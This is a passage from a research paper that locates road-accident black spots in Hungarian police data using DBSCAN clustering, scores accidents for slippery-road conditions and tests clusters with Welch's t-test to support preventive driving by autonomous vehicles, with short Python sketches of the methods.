From the perspective of autonomous car control, the role of this safety potential is essential. The self-driven car has no options to solve road safety problems. The only important information is the existence of accident black spots and the potential safety mechanisms which may help to avoid further crashes. As a second difference, from the road safety engineers' point of view, it is not necessary that the accidents of a given black spot have common characteristics. The hot spot definition of this paper assumes that accidents of a given cluster have similar attributes, because this pattern will be the basis of the preventive actions.

The localization of accident black spot candidates is a heavily researched area and there are several fully-automated methods to find these. Nevertheless, the further automatic pattern analysis of these is not as well developed.
This phase usually needs a great deal of manual work by human road safety experts (they must travel to the scene and investigate the environment to support their decisions about recommended actions). This process can be supported by some general rules, but it is mostly done manually, using the pattern matching capability of the human mind. To fully automate it, it is necessary to make this method applicable to self-driven cars. According to this objective, this paper focuses on helping autonomous vehicles to take the appropriate preventive actions to avoid accidents:

• Localize black spot candidates using the historical accident database;
• Make assumptions about the common risk factors and patterns of these accidents;
• According to these preliminary results, the autonomous device will know where the dangerous areas are and what preventive actions to take.

Automated accident prevention

Autonomous vehicles will have several ways to avoid accidents, and this is therefore a hot, widely researched topic. Nevertheless, most papers deal with options existing only in the far future, when autonomous devices will be part of a densely connected network without any human interference. Real-world implementations are far from this point, but some technologies already exist, although they are not closely related to autonomous vehicles. Currently implemented accident prevention systems are built into traditional cars as braking assistants, etc. However, it is worth considering these because such methods will be the predecessors of the future techniques applicable to self-driven vehicles.

The two main classes of accident prevention systems are passive and active methods. Passive systems send notifications to the driver about their warnings but do not perform any active operations. In contrast, active methods have the right to perform interventions (braking, steering, etc.) to avoid accidents. It seems obvious that these prevention systems have a large positive impact on accident prevention, and it has already been proven by Jermakian (2011) that passive methods have significant benefits: more than one million vehicle crashes are prevented in the USA each year. As Harper et al. proved (Harper, Hendrickson & Samaras, 2016), the cost-benefit ratio of these systems is also positive.

Brake assist systems are among the most researched active systems, where the potential benefits are the lower risk of injury and the less serious injuries of pedestrians (Rosén et al., 2010). Current forward-looking crash avoidance systems usually continuously scan the space in front of the vehicle using various devices (camera, radar, LIDAR, etc.). If any of these detects an unexpected vehicle or pedestrian, the brake assistant system takes the appropriate (preliminary) actions, which can be the enforcement of the braking system or direct autonomous emergency braking. Bálint, Fagerlind & Kullgren (2013) presented very promising results with a test-based methodology for the assessment of braking and pre-crash warning systems. These typically use only the real-time information given by the vehicle sensors, without any knowledge extracted from historical accident data.

Run-time crash prediction models are also related to the topic of this paper. Hossain et al. (2019) presented a comprehensive comparison and review of existing real-time crash prediction models.
The basic assumption of these systems is that the probability of a crash situation within a short time window can be predicted from the current environmental parameters measured by the sensors. Therefore, most of the existing methods use only the acquired sensor data to make real-time decisions about potential crash situations; their authors do not use the already existing accident databases as an input to fine-tune the system's predictions.

The work of Lenard, Badea-Romero & Danton (2014) is closer to the research presented in this paper. They analyzed common accident scenarios to support the development of autonomous emergency braking protocols. Using a hierarchical ascending clustering method on two British accident databases filtered by some previously defined conditions (only urban pedestrian accidents that occurred in daylight and in fine weather), they presented the attributes of the most common accident scenarios. Their paper defines the major accident scenarios and classifies all existing pedestrian accidents into one of these categories. The results of this research would be useful in the training phase of a self-driven vehicle to introduce all possible scenarios to the algorithm. The objective of Nitsche et al. (2017) is similar: they propose a novel data analysis method to detect pre-crash situations at various (T- and four-legged) intersections. The purpose of this work is also to support the safety tests of autonomous devices. They clustered accident data into several distinct partitions with the well-known k-medoids procedure. Based on these clusters, an association rule mining algorithm was applied to each cluster to specify the driving scenarios. The input was a crash database from the UK (containing one thousand junction crashes). The result of the paper is thirteen crash clusters describing the main pre-accident situations.

MATERIALS AND METHODS
Black spot candidate localization
Density-based spatial clustering of applications with noise
For the black spot candidate localization step, the Density-Based Spatial Clustering of Applications with Noise (DBSCAN) algorithm was used. It is not widely used in the field of road safety engineering; however, it is one of the most efficient density-based clustering methods in data mining. The main objective of density-based clustering is the following: the density of elements within a cluster must be significantly higher than between separate clusters. This principle distinguishes two classes of elements: items inside a cluster and outliers (elements outside of any cluster).

In the road safety task, the elements are the accidents on the public road network. These are identified by spatial GPS coordinates and have several additional attributes (time, accident nature, etc.). The general DBSCAN method needs a definition of the distance between two elements. In the case of road accidents, the Euclidean distance between the two GPS coordinates was used (black spots are usually spread over a small area; therefore, this is a good estimate of the real road-network distances). The DBSCAN method requires two additional parameters:

- ε: a radius-type variable (meters);
- MinPts: the lower limit for the number of accidents in a cluster (accidents).
The main definitions of the DBSCAN algorithm are as follows:

- the ε environment of a given element x is the space within the ε radius of x;
- x is an internal element if the ε environment of x contains at least MinPts elements (including x itself);
- x is directly densely reachable from y if x is in the ε environment of y and y is an internal element;
- x is densely reachable from y if it is accessible from y through a chain of directly densely reachable elements;
- all points that are not densely reachable from any internal element are outliers;
- if x is an internal element, then it forms a cluster together with all elements densely reachable from x.

The objective of the process is to find clusters of accidents in the public road network in which all elements are densely connected and no further expansion is possible. The steps to achieve this are as follows (a minimal implementation sketch is given at the end of this subsection):

1. Select one internal element from the accident database as the starting point. This will be the first point of the cluster.
2. Extend the cluster recursively with all directly densely reachable elements from any point of the cluster.
3. If it is not possible to extend the cluster with additional points, the cluster can be considered final (it contains all items densely reachable from the starting point). If this cluster meets the prerequisites for a black spot candidate, it is stored in the result set.
4. Repeat steps 1–3 for all internal elements of the database.

The result of this procedure is a set of black spot candidates. The prerequisites checked in step 3 can be one or more of the following:

- the number of accidents should exceed a given threshold;
- the accident density of the given area should exceed a given threshold.

The proposed method has several advantages over the traditional methods. Unlike the sliding window algorithm, which analyzes only the accidents of a given road section, DBSCAN is a spatial algorithm that handles all accidents of the database together. This difference is substantial in the case of junctions, where accidents of the same junction may be assigned to different road numbers. It can be especially critical in built-up areas and traffic roundabouts, where the number of connected roads is high.
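The following is a minimal, self-contained sketch of the clustering step described above; it is an illustration, not the author's implementation. It assumes planar (projected) coordinates in meters, so ε can be given directly as a radius, and the naive O(n²) neighbour search is sufficient for county-sized datasets but would need a spatial index for larger ones.

```python
from math import hypot

def dbscan(points, eps, min_pts):
    """Assign a cluster label to each point; outliers keep the label None.

    points  - list of (x, y) tuples in a planar (projected) coordinate system
    eps     - neighbourhood radius in meters
    min_pts - minimum number of points (including the point itself) that makes
              a point an internal (core) element
    """
    labels = [None] * len(points)
    cluster_id = 0

    def neighbours(i):
        xi, yi = points[i]
        return [j for j, (xj, yj) in enumerate(points)
                if hypot(xi - xj, yi - yj) <= eps]

    for i in range(len(points)):
        if labels[i] is not None or len(neighbours(i)) < min_pts:
            continue                      # already clustered, or not a core point
        labels[i] = cluster_id            # start a new cluster from the core point i
        queue = neighbours(i)
        while queue:                      # expand with densely reachable elements
            j = queue.pop()
            if labels[j] is None:
                labels[j] = cluster_id
                j_neigh = neighbours(j)
                if len(j_neigh) >= min_pts:   # expand further only through core points
                    queue.extend(j_neigh)
        cluster_id += 1
    return labels
```

With the parameters reported later in the paper (ε = 100 m), a call such as `dbscan(points, 100.0, 5)` on projected accident coordinates yields the raw clusters; the filtering by accident count and density is sketched separately after the parameter description.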
Determination of accident density
One of the benefits of the traditional sliding window method is that it is easy to interpret for human experts. The number of accidents in a given road section is a very informative number. It is also easy to calculate derived values, such as the accident density, which is the number of accidents divided by the length of the road section. This divisor is often extended with the traffic volume or the length of the time period.

In the case of spatial black spot localization techniques, the definition of road accident density is more complex. These methods are not based on road sections, so division by the section length is not applicable. Instead, it is necessary to calculate the area of the black spot and use it as the divisor. This article proposes a novel method to calculate the area of the region spanned by the black spot accidents: it finds the smallest convex boundary polygon containing all accidents of a given cluster. The density of the black spot is then the number of accidents divided by the area of this polygon. The area is calculated by Gauss' area (shoelace) formula, Eq. (1):

a(C) = \frac{1}{2}\left|\sum_{i=1}^{n-1} x_i y_{i+1} + x_n y_1 - \sum_{i=1}^{n-1} x_{i+1} y_i - x_1 y_n\right|
     = \frac{1}{2}\left|x_1 y_2 + x_2 y_3 + \dots + x_{n-1} y_n + x_n y_1 - x_2 y_1 - x_3 y_2 - \dots - x_n y_{n-1} - x_1 y_n\right|   (1)

where
- a(C): the area of the C polygon (cluster);
- n: the number of vertices of the polygon;
- (x_i, y_i): the two-dimensional coordinates of the i-th vertex of the C polygon (i ∈ {1, 2, …, n}).

If the number of accidents is less than three, the proposed area concept is not applicable. However, clusters with one or two accidents are usually not considered black spot candidates, so this is not a real limitation. In the case of clusters with more than two accidents, the accident density is calculated as Eq. (2):

\rho(C) = \frac{|C|}{a(C)}   (2)

where
- ρ(C): the accident density of the C cluster;
- |C|: the number of accidents in the C cluster.

The formula requires the sequence of corner coordinates of the polygon in a given order (in this case, a clockwise direction). The DBSCAN algorithm builds a cluster incrementally from a starting point, and its result is a set of accidents. Consequently, an additional step is needed to obtain the corner points in the appropriate order. It is possible to do this after the DBSCAN finishes, but it is also possible to extend the DBSCAN method with the following steps:

- In the case of the first (P1) and second (P2) items, the concept of a "polygon" cannot be interpreted. Hence, these are automatically marked as corner points of the polygon.
- With the third point (P3), the items already form a polygon. The P3 point must be on the right side of the vector P1P2, which can be checked using the sign of the cross product, to ensure the clockwise direction required by the Gauss formula. If this is not the case, it is necessary to swap P1 and P2. After that step, P1, P2 and P3 are the corner points of the polygon in a clockwise direction.
- For every additional point (P4, P5, …, Pn), it must be checked whether the new point is inside the current convex boundary polygon. This can be done by checking whether the new point (Pnew) is on the right side of every boundary vector. If this is true for each vector, the point is inside the polygon (or on its border); therefore, it is not necessary to modify the shape. If the new point is on the left side of any boundary vector, then it is outside the convex boundary polygon, and there must be a sequence of one or more consecutive vectors breaking the rule. Let k and l be the indices of the first and last vectors of this sequence. It is then possible to substitute the P_{k-1}, P_k, P_{k+1}, …, P_{l-1}, P_l, P_{l+1} part of the boundary vertex list with P_{k-1}, Pnew, P_{l+1}. Because of the convexity of the original polygon, the P_{k-1}, Pnew, P_{l+1} triangle contains all the P_k, P_{k+1}, …, P_{l-1}, P_l points, and the transformation also preserves the convexity of the new polygon and the clockwise direction of the corner points.

Three figures illustrating this process have been attached to the article in the Supplemental File "DBSCAN images". Using this method, it is possible to calculate the black spot area and the accident density of a given cluster.
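As a concrete illustration of Eqs. (1)–(2), the short sketch below computes the polygon area with the shoelace formula and derives the accident density. It assumes the cluster's convex-hull vertices are already available in order (for example from the incremental construction above, or from a ready-made routine such as scipy.spatial.ConvexHull); the example values are made up.

```python
def polygon_area(vertices):
    """Gauss' (shoelace) area formula, Eq. (1); vertices in clockwise or
    counter-clockwise order, coordinates in meters."""
    n = len(vertices)
    acc = 0.0
    for i in range(n):
        x1, y1 = vertices[i]
        x2, y2 = vertices[(i + 1) % n]     # wrap around to close the polygon
        acc += x1 * y2 - x2 * y1
    return abs(acc) / 2.0


def accident_density(vertices, accident_count):
    """Eq. (2): number of accidents divided by the polygon area (accidents/m^2)."""
    area = polygon_area(vertices)
    return accident_count / area if area > 0 else float("inf")


# Example: a 100 m x 50 m rectangular cluster containing 8 accidents.
hull = [(0.0, 0.0), (100.0, 0.0), (100.0, 50.0), (0.0, 50.0)]
print(polygon_area(hull))           # 5000.0
print(accident_density(hull, 8))    # 0.0016
```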
Analysis of black spot candidates
The result of the various black spot localization algorithms (sliding window, clustering, etc.) is a list of potential hot spots. However, having some accidents in a cluster does not mean that the hazard of accidents is significantly higher there. It is generally accepted by researchers that the number of accidents in a given area (section) of the road network follows a Poisson distribution. A special feature of road accident distributions is that the number of accidents is relatively low (compared to the size of the road network) and the variance is high. Therefore, the volatility of the accident number is very high, which means that a cluster where the number of accidents is above the average is not necessarily a hot spot. The list given by the previous methods needs further examination to find the really hazardous sites.

At this point, the methodology of this paper differs significantly from the work of road safety engineers. Their objective is to find hazardous sites and take the appropriate actions to decrease the probability of further accidents. They must select the sites with the largest safety potential, where the most cost-effective actions can be taken to decrease the number and severity of accidents. This is a very complex procedure based on the data of historical accidents, the expected number of accidents, the environmental conditions, and the costs and expected benefits of the different safety actions. Contrary to this, the objective of a self-driven car is not the elimination of road safety problems. As an ordinary participant in traffic, it has no chance to make the road network better. Nevertheless, as a passive participant, it should be able to localize the problematic areas, analyze them, and take the necessary preliminary steps to avoid further accidents.

Another difference between the methods of these fields is that, from the perspective of road safety engineers, it is not necessary that the accidents of a given black spot have any special patterns or common characteristics. For the self-driven car, the localization of high-risk areas where the number of accidents is significantly higher than expected is not enough, because this fact alone does not help to take the appropriate preliminary steps. This is the reason why this paper focuses on the identification of accident reasons. The result of this further investigation can be one of the following:

- If it is not possible to identify any unexpected pattern in the accident attributes, then the cluster cannot be considered an accident black spot. The high number of accidents is just a coincidence, and there are no suggestions to avoid further crashes.
- In contrast, if there is a special pattern in the accident attributes, then this cluster has the potential to decrease the probability of further crashes. The reasons for such similar accidents can be related to the road network, weather, lighting conditions or human errors (drivers and pedestrians).

In the second case, the knowledge of this special pattern (the common reasons for accidents in the same cluster) can be essential. It is presumable that accidents caused by the car itself can be avoided. For example, if it is visible from the accident database that the number of accidents caused by a slippery road is significantly higher than expected in a given area, the self-driven car should decrease its speed or change its trajectory to reduce the probability of this event.
However, it is also worth noting that preliminary actions can be very useful for decreasing the probability of accidents caused by other drivers or pedestrians. For example, if the historical accident data shows that the number of accidents caused by pedestrians is higher than expected, then the self-driven car can proactively try to decrease this negative potential by using some type of visual or auditory warning or by decreasing its speed.

Deducing the environmental reasons for accidents
Accident databases usually contain a certain taxonomy of accident types. These are usually structured classes of specific events and reasons, and scene investigators must classify each accident into one of these categories, which is very important statistical information. This approach has several limitations, because it is rare that the occurrence of an accident originates from one specific reason. Usually, multiple reasons, forming a complex structure, cause an accident. For example, the investigator may code the accident as a "catching-up accident", but this does not give any information about why the accident occurred. It is also typical that most of the accidents in the Hungarian road network are attributed to an "incorrect choice of speed". However, it is obvious that not just the speeding itself was the triggering reason for these accidents; there should be other factors as well (although it is unarguable that speeding increases the effects of other factors and makes certain accidents unavoidable).

Based on these experiences, this paper does not try to assign all accidents to mutually exclusive accident reason classes. On the contrary, the proposed method defines several potential accident reasons, which are not mutually exclusive. These factors can be complementary and can have different weights and roles in the occurrence of the accident. Only the reasons with potential preventive operations are discussed, because these carry valuable information for the self-driven car.

The proposed method is based on the following consecutive steps:

1. All known accidents are analyzed with respect to all possible accident reasons, and a score value is assigned to each accident showing how much the accident is affected by a given factor.
2. The distribution of these score values is approximated by the examination of all known accidents.
3. Based on the result of the previously presented DBSCAN algorithm, the distribution of these score values is also calculated for each black spot candidate.
4. The distributions for all accidents and for a given black spot are compared. If the distribution of a given factor differs significantly (in the positive direction), the cluster is marked as a hazardous area for the given factor.

The independent accident reason factors, such as "slippery road", "bad visibility" or "careless pedestrians", are denoted by R1, R2, …, RN, where N is their number. As discussed previously, these reasons are not stored directly in the database but can be inferred from the general attributes of the accidents. A scoring table is used for this purpose: the weights of the i-th accident factor (1 ≤ i ≤ N) are stored as W^i, where W^i_{attr=value} is the score of the R_i accident reason when the attr attribute equals value. Accordingly, the cumulative score of the R_i reason for accident x is given by Eq. (3):
S_i(x) = \sum_{\forall attr \in A(x)} W^i_{attr = x.attr}   (3)

where S_i(x) is the score value of the R_i reason for accident x, x.y denotes the value of the specific attribute y of accident x, and A(x) contains all the available known attributes of x.

It is also possible to calculate the same value not just for a single accident but for all accidents of a black spot candidate. The H_i(C) set contains the S_i(x) score values of all accidents x in the C cluster, as shown in Eq. (4):

H_i(C) = \{ S_i(x) \mid x \in C \}   (4)
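The scoring of Eqs. (3)–(4) can be written down in a few lines. The sketch below is illustrative only: the attribute names and weight values are placeholders, not the real database codes or the weights of the Supplemental File.

```python
# Hypothetical weight table for one factor (R1, slippery road). Keys are
# (attribute, coded value) pairs; missing pairs implicitly score 0.
W1 = {
    ("roadsrf", 4): 1.0,   # road surface: "oily, slippery"
    ("roadsrf", 3): 0.6,   # road surface: "snowy" (illustrative weight)
    ("wthr", 6): 0.3,      # weather: snowing
    ("accnat", 31): 0.2,   # accident nature: slipping, carving, overturning
}

def score(accident, weights):
    """Eq. (3): sum the weights of all (attribute, value) pairs of one accident."""
    return sum(weights.get((attr, value), 0.0) for attr, value in accident.items())

def cluster_scores(cluster, weights):
    """Eq. (4): the score values H_i(C) of all accidents in a cluster."""
    return [score(x, weights) for x in cluster]

# Example accident record (attribute -> coded value).
x = {"roadsrf": 4, "wthr": 6, "accnat": 31, "driver_age": 42}
print(score(x, W1))                              # 1.0 + 0.3 + 0.2 = 1.5
print(cluster_scores([x, {"roadsrf": 1}], W1))   # [1.5, 0.0]
```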
Distribution of accident scores
As a further step, it is necessary to determine whether there is any significant reason proving that the C set is a real hot spot. For a well-established decision, it is necessary to analyze all the accidents in the database to determine the main characteristics of the distributions of all R reasons. Based on these results, it is possible to compare the distribution of the H_i(C) values of the examined hot spot candidate C with the reference values Ĥ_i computed for the whole accident database D for a given reason R_i, Eq. (5):

\hat{H}_i = \{ S_i(x) \mid x \in D \}   (5)

If the distributions of H_i(C) and Ĥ_i are the same, it can be assumed that the R_i reason has no significant role in the accumulation of accidents. Otherwise, if these distributions differ in the sense that the R_i score values are higher in H_i(C) than in Ĥ_i, there may be some causal relationship between them.

Hypothesis tests can show whether the mean value of a given accident reason score (R_i) in a given cluster is higher than the same mean for all accidents in the database. The alternative hypothesis states that the mean score of the cluster minus the mean score of the whole population is greater than zero, Eq. (7); the null hypothesis covers all other possible outcomes, Eq. (6):

H_0: \mu_C - \mu_D \le 0   (6)
H_1: \mu_C - \mu_D > 0   (7)

where
- μ_C is the mean score value of the black spot candidate;
- μ_D is the mean score value of all accidents in the database (the full population).

This article proposes the application of Welch's t-test, which is a two-sample location test used to test the hypothesis that the means of two populations are equal (like the popular Student's t-test, but Welch's test is more reliable when the sample sizes are significantly different and the variances are also unequal). Welch's test assumes that both populations have normal distributions. Nevertheless, in the case of moderately large samples and a one-tailed test, t-tests are relatively robust to moderate violations of the normality assumption. In this case, the populations are large enough (the full population contains thousands of accidents, and black spots also contain several accidents), and the one-tailed test is the appropriate method because we are looking for clusters where the mean is significantly higher than in the entire population. Ahad & Yahaya (2014) show that Welch's test can cause Type I errors when the variances of the two populations differ and the distributions are non-normal. In this case, the variances are similar, and Type I errors are acceptable (some identified black spot candidates may not be real black spots). According to Welch's method, the t statistic is given by Eq. (8):

t = \frac{\bar{x}_1 - \bar{x}_2}{\sqrt{\frac{v_1}{n_1} + \frac{v_2}{n_2}}}   (8)

where
- x̄_1 is the mean of the first sample;
- x̄_2 is the mean of the second sample;
- v_1 is the variance of the first sample;
- v_2 is the variance of the second sample;
- n_1 is the size of the first sample;
- n_2 is the size of the second sample.

The degrees of freedom (ν) are calculated by Eq. (9):

\nu = \frac{\left(\frac{v_1}{n_1} + \frac{v_2}{n_2}\right)^2}{\frac{v_1^2}{n_1^2 (n_1 - 1)} + \frac{v_2^2}{n_2^2 (n_2 - 1)}}   (9)

Based on the previously calculated t and ν values, the t-distribution can be used to determine the probability P. The one-tailed test is applied because it answers the question of whether the mean of the cluster is significantly higher than the mean of the entire population. Based on P and a previously defined level of significance (α), it is possible to reject the null hypothesis or not. In the case of rejection, it can be assumed that the examined accident reason is related to the accidents as one of the possible causal factors. If the null hypothesis cannot be rejected, there is no evidence for this.
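A small sketch of the one-tailed Welch test used here, implementing Eqs. (8)–(9) directly and using SciPy only for the t-distribution tail probability; this is an illustration of the test, not the author's code, and the sample values are made up.

```python
from math import sqrt
from statistics import mean, variance
from scipy.stats import t as t_dist

def welch_one_tailed(cluster_scores, population_scores):
    """Return (t, dof, p) for the alternative H1: mean(cluster) > mean(population)."""
    n1, n2 = len(cluster_scores), len(population_scores)
    m1, m2 = mean(cluster_scores), mean(population_scores)
    v1, v2 = variance(cluster_scores), variance(population_scores)  # sample variances
    t_stat = (m1 - m2) / sqrt(v1 / n1 + v2 / n2)                    # Eq. (8)
    dof = (v1 / n1 + v2 / n2) ** 2 / (
        v1 ** 2 / (n1 ** 2 * (n1 - 1)) + v2 ** 2 / (n2 ** 2 * (n2 - 1))
    )                                                               # Eq. (9)
    p_value = t_dist.sf(t_stat, dof)    # one-tailed: P(T > t)
    return t_stat, dof, p_value

# Reject the null hypothesis at alpha = 0.05 when p_value < 0.05.
t_stat, dof, p = welch_one_tailed([0.9, 1.2, 0.7, 1.0, 0.8], [0.2] * 50 + [0.6] * 10)
print(round(t_stat, 3), round(dof, 1), round(p, 4))
```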
Scoring factors
The practical evaluation presented in this paper focuses on one specific accident reason (N = 1): the slippery road condition factor (R1). The accident database used contains more than two hundred fields, in four categories:

- general accident attributes (date and time, location, nature, etc.);
- general environmental attributes (weather conditions, visibility, etc.);
- data about the participants (vehicle or pedestrian, speed, direction, etc.);
- data about the injured persons (age of the injured person, etc.).

Weighting tables have been developed to estimate the effect of a given accident reason factor on the occurrence of the accident. Focusing on the slippery road condition factor, the following three types of accident properties can be distinguished:

- Some fields directly contain information about the examined factor. In this case, the "Road surface" property (abbreviated as roadsrf) of an accident has an option "4 - oily, slippery". This is taken as the basis for the further weights; the score value of this attribute is 1.0 (W^1_{roadsrf=4} = 1.0), showing that the accident is highly affected by the slippery road condition factor. It is worth noting that it is not efficient to make a binary decision about the examined factor based on this value alone, because there are other values ("3 - snowy", "5 - other staining") with similar effects. This is reflected in the weight values.
- In some cases, there are no such direct fields, but it is possible to deduce information about a given factor from the already existing data. For example, in the case of the slippery road condition factor, the weather conditions (the wthr property in the database) can help this process. In these cases, the score values assigned to the different weather condition cases give an estimate of how much the given factor affected the occurrence of the accident. In the case of snowing ("6 - snowy"), it is higher (W^1_{wthr=4} = 0.3) than for ideal conditions like "1 - sunny" (W^1_{wthr=1} = 0). It is also considered that in the case of the accident nature "31 - slipping, carving, overturning on the road", the slippery road factor influenced the outcome (W^1_{accnat=32} = 0.2).
- The last group contains the fields without any relation to the examined factor. For example, fields like "Age of the driver" do not affect the results. The weights for all values of these fields are consequently zero.

The Supplemental File "Scoring tables" contains the weight values used for the affected fields. The weight values are based on a comprehensive literature review from the fields of road safety and road friction measurement (Wallman & Åström, 2001; Andersson et al., 2007; Sokolovskij, 2010; Colomb, Duthon & Laukkanen, 2017). However, some of the values are affected by the subjective judgement of the authors; further research is needed to determine the most efficient weights.

RESULTS
Accident database
This paper uses the official road accident database of Hungary, where data on accidents with personal injury are collected by the police. After some conversion and corrections, this dataset is handled by the Central Statistics Department. The completeness of the database is ensured by legislation: participants of public road accidents with personal injury are obliged to report them to the police. A police officer starts the data collection on the spot by recording the most relevant data about the location and the main attributes of the accident (participants, casualties, etc.). After 30 days, it is possible to refine the final injury level of all participants. After that finalization step, the Central Statistics Department collects and rechecks all records. Road safety engineers and researchers can use this database for their work.

The evaluation part of this paper is based on the accidents of this database from 1 January 2011 to 31 December 2018. It contains 128,767 accidents with personal injury, classified into three categories: fatal, serious and slight. There are no accidents in the database without personal injury. Because of the high number of accidents and the high computational demand of the clustering algorithm, this paper deals with two counties of Hungary: the accidents of "Győr-Moson-Sopron" county were used to find the optimal parameters of the algorithm, and "Heves" county was used as a control dataset.

DBSCAN clustering
The input database for the clustering was the set of personal injury accidents of a given county of Hungary ("Győr-Moson-Sopron" county). This experiment was performed twice, on two consecutive time intervals, to measure the robustness of the method. The examined t interval contains the accidents that occurred between 1 January 2011 and 31 December 2014, and the t̂ validation interval was 1 January 2015–1 December 2018. The number of accidents was 3,256 in the t interval (the D set contains these accidents) and 3,011 in the t̂ interval (the D̂ set contains these accidents).

In the hot spot search phase, the following DBSCAN parameters were used:

- ε value: 100 m;
- minimum accident count: five accidents;
- minimum accident density: 0.0001 accident/m².

The result of this raw DBSCAN clustering was 165 black spot candidates in the t interval and 152 black spot candidates in the t̂ interval.
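Putting the parameters above together with the earlier sketches, the candidate filtering could look like the following (again only a sketch; `clusters` would be the output of the DBSCAN sketch and `areas` the matching polygon areas from the shoelace formula):

```python
EPS = 100.0            # meters (DBSCAN radius)
MIN_ACCIDENTS = 5      # minimum accident count per candidate
MIN_DENSITY = 0.0001   # accidents per square meter

def black_spot_candidates(clusters, areas):
    """Keep only clusters that satisfy both prerequisites of the search."""
    candidates = []
    for cluster, area in zip(clusters, areas):
        if len(cluster) < MIN_ACCIDENTS:
            continue
        if area <= 0 or len(cluster) / area < MIN_DENSITY:
            continue
        candidates.append(cluster)
    return candidates
```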
Statistical test
Unlike traditional black spot searching methods, the next step is not the calculation of some safety potential index, but the determination of the different accident reason factors using the scoring method presented above. Considering the R1 slippery road condition factor, the S1(x) value is calculated for all x accidents. Most of these are not related to a slippery road surface, so their S1 value is 0. As a prerequisite of the Welch test, a population of S1(y) values is generated, where y runs over all accidents in the database. The main parameters of this sample are:

- number of items (n1): 3,256;
- mean (x̄1): 0.2438;
- variance (v1): 0.1115.

It is possible to calculate these values for every black spot candidate as well, iterating over all of them. Based on the comparison of the whole population and the black spot candidates, the Welch test was applied to obtain the statistical result values. According to the Welch test, the Student distribution with these parameters and the given level of significance (α = 0.05) can be used to decide whether to reject the null hypothesis. Table 1 shows the black spot candidates of the t interval where the null hypothesis was rejected because the mean of the R1 score for the given black spot candidate was significantly higher than the expected average.

Table 1: Accident black spots where the null hypothesis was rejected.
#  Location                    Count  Mean  Variance  Prob.
1  LAT 47.6301 / LON 16.7333   8      0.75  0.0857    0.000878
2  LAT 47.5956 / LON 17.5872   11     0.55  0.0887    0.003629
3  LAT 47.3866 / LON 17.8659   5      1.12  0.2820    0.010502
4  LAT 47.5708 / LON 17.5790   6      0.56  0.1307    0.040157

It can be assumed that these black spots are affected by the examined R1 factor. Figure 1 shows the environment and the accidents of the first black spot from this list. As is visible in the satellite image, it is part of a long, straight road; consequently, there is no apparent reason for an autonomous car to decrease its speed.

[Figure 1: Road accidents of the black spot located at LAT 47.6301 / LON 16.7333. Map data ©2021 Google; satellite images ©2021 CNES/Airbus, Geoimage Austria, Maxar Technologies. Full-size DOI: 10.7717/peerj-cs.399/fig-1]

From the historical database, Table 2 contains detailed information about the accidents of this black spot.

Table 2: Accidents of the black spot located at LAT 47.6301 / LON 16.7333.
Time               Latitude  Longitude  Outcome  Surface  Weather   Accident nature
2011.02.03 16:05   47.6302   16.7327    Light    Wet      Sunny     Track leaving
2011.05.06 17:35   47.6298   16.7340    Hard     Normal   Sunny     Track leaving
2011.06.26 10:24   47.6300   16.7338    Light    Wet      Rainy     Track leaving
2011.06.26 10:28   47.6300   16.7334    Hard     Wet      Rainy     Track leaving
2011.07.21 9:10    47.6302   16.7330    Hard     Wet      Rainy     Track leaving
2013.06.24 17:50   47.6298   16.7340    Light    Wet      Overcast  Frontal crash
2014.01.09 12:45   47.6301   16.7330    Light    Wet      Sunny     Slipping, carving
2014.01.20 10:45   47.6303   16.7325    Hard     Wet      Overcast  Track leaving

As is visible, a high number of accidents is affected by one or more slippery-road-related attributes. This pattern significantly differs from the expectations; hence, there should be some environmental issue at this location. The examination and elimination of these causes is the task of road safety experts (Orosz et al., 2015). Nevertheless, until then, it is worth taking preventive steps to decrease the chance of further accidents. The autonomous vehicle should adapt its control to this situation (speed reduction, using a safer trajectory, etc.).

DISCUSSION
There is no generally accepted method for the evaluation of black spots, because there is no exact definition for them. Based on real-world accident data, there is no list of real black spots, so the widely accepted confusion-table-based methods are not usable here (assigning the clusters into true-positive, false-positive, true-negative and false-negative classes and calculating the common measures like accuracy, recall, etc.). Therefore, it is necessary to evaluate the results based on the general characteristics of these locations.

The accident density of black spots is significantly higher than the average; however, this is only a necessary condition of validity, not a sufficient one. Because of the high volatility of accident numbers, the regression-to-the-mean effect can distort the results. It is a well-known statistical phenomenon that roads with a high number of road accidents in a particular period are likely to have fewer in the consecutive period, simply because of random fluctuations in crash numbers. In the case of real black spots, the high number of accidents is permanent. Thus, a good evaluation technique is to check the number of accidents of the consecutive validation time interval inside the clusters identified in the t interval. There are specific tests for this purpose, introduced by Cheng & Washington (2005) and used by various articles (Montella, 2010): site consistency tests, method consistency tests, and the total rank differences test. Since these were developed for black spot searching methods based on road intervals, it was necessary to adapt them to spatial coordinates and black spot regions. The input series for all tests are the results of the previous black spot identification process:

- C_i is the i-th cluster identified in the D database (1 ≤ i ≤ n, where n is the number of black spots identified in the t interval);
- Ĉ_i is the i-th cluster identified in the D̂ database (1 ≤ i ≤ n̂, where n̂ is the number of black spots identified in the t̂ interval).

Site consistency test
This test assumes that any site identified as a black spot in the t time period should also reveal high risk in the subsequent t̂ time period. Let π(C) be the convex boundary polygon of the C cluster given by the algorithm presented above, and let Π be the union of these regions identified in the t time period, Eq. (10):

\Pi = \bigcup_{i=1}^{n} \pi(C_i)   (10)

As the next step, we collect all accidents of the consecutive t̂ time period that fall inside the clusters identified in the prior t time period. The T1 value is the number of these accidents divided by the summarized area of these clusters; thus, it is the accident density of these clusters in the consecutive time period, Eq. (11):

T_1 = \frac{\left|\{ x \in \hat{D} \mid x\ \text{inside}\ \Pi \}\right|}{\sum_{i=1}^{n} a(C_i)}   (11)
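To illustrate the T1 computation, the sketch below checks point-in-polygon membership against the clockwise convex hulls of the period-t clusters; the polygons and their areas are assumed to come from the earlier sketches, and this is an illustrative reimplementation rather than the original code.

```python
def inside_convex(point, vertices):
    """True if `point` lies inside or on the border of a clockwise convex polygon."""
    px, py = point
    n = len(vertices)
    for i in range(n):
        x1, y1 = vertices[i]
        x2, y2 = vertices[(i + 1) % n]
        # For clockwise vertices the interior lies to the right of every edge,
        # so a positive cross product means the point is outside.
        if (x2 - x1) * (py - y1) - (y2 - y1) * (px - x1) > 0:
            return False
    return True

def site_consistency_T1(cluster_polygons, cluster_areas, accidents_t_hat):
    """Eq. (11): later-period accidents falling inside the earlier clusters,
    divided by the summed area of those clusters."""
    hits = sum(
        1 for a in accidents_t_hat
        if any(inside_convex(a, poly) for poly in cluster_polygons)
    )
    return hits / sum(cluster_areas)
```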
Accident reason factor consistency test
As this paper goes further by revealing the accident reason factors, it is also worth checking whether the accidents of the t̂ time period that fall inside the region identified in the t time period have the same attributes. This leads to the introduction of the T′1 value, which is the average score of these accidents, Eq. (12):

